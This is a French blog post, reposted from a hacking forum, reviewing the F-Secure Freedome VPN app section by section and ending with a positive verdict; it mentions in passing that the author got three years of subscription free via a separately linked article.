from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1KS0pLU
via IFTTT

vendredi 2 octobre 2015

Test VPN Freedome, F-Secure

Il y a peut de temps, j'ai rédigé un article pour gratter trois ans d'abonnements gratuit au VPN Freedome de la société F-Secure. POur ceux qui sont intéressés, tout est la : http://ift.tt/1jDNTqC

Étant donné que je n'ai trouve de test de ce VPN nul part, et quand ce moment c'est la mode de parler anonymat, c'est parti ! ;)

Freedome


La première section est en gros un bref résumé des autres et vous pourrez y voir sans trop de détails combien de sites le VPN a bloqué et combien de tentatives de tracking il a empêché. On peut aussi y voir notre géolocalisation (qui correspond en gros à la capitale de votre pays) Vous pourrez évidemment la changer et il y a au total une vingtaine d'emplacements que ce soit à Hong Kong ou encore Copenhague en passant par Melbourne... Bref l'embarras du choix !(notez que la connexion à un autre server est plutôt rapide).
C'est aussi ici que vous déciderez si vous activez la protection ou non.


Protection de la navigation
La deuxième section est elle aussi très très simple vous pouvez elle aussi choisir de l'activer ou non, elle s'assure juste de bloquer les sites quelle juge dangereux (vol de carte de crédit, de mots de passe...)

Anti-Tracking
Une nouvelle section un peux plus intéressante que la seconde est celle de l'Anti Tracker. LE VPN va en fait masquer votre IP (sans blague ?!) Mais il va aussi bloquer les cookies de tracking et va bloquer toute connexion entre le site que vous visitez actuellement et d'autres sites qui collectent des données. Comme vous pouvez le voir je suis actuellement à 58 après seulement une demi-heure de navigation et encore je suis très généreux comme quoi ça monte vite...
Navigation privée
On passe rapidement sur cette section sur laquelle la société nous explique bien gentiment que pour une meilleure sécurité, on peut emprunter son navigateur de recherche en cliquant sur le gros bouton vert juste là.
Paramètres
Ici vous pourrez paramétrez l'application en fonction de votre langue ou de vos préférences pour le lancement au démarrage...

L'abonnement
A l'abonnement... Comme vous pouvez le voir, je dispose ici de 1105 jours d'abonnement actif (et tout ça sans payer :D) Si vous n’êtes pas allés voir mon news ou si vous voulez rester en paix avec votre conscience, sachez que vous pourrez profitez de ce VPN pour le tarif de 50€/an . Vous pouvez évidemment vous connecter avec un même abonnement sur tous vos appareils (mobiles, PC...).


Aide
La section Aide qui vous renvoie vers les réseaux sociaux ainsi qu'à une FAQ ou encore un endroit pour laisser votre avis.
Avis
Voilà on arrive à la fin de ce test du VPN Freedome v.1.0.1958.0 Mon avis reste quand même positif. On s'en tire finalement avec un VPN au style simple et épuré qui est en plus efficace et tout ça avec en plus trois ans d'abonnement gratuits... Bref, je suis plutôt content.

Pour ceux que ça intéresse:

:D


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PT6rgO
via IFTTT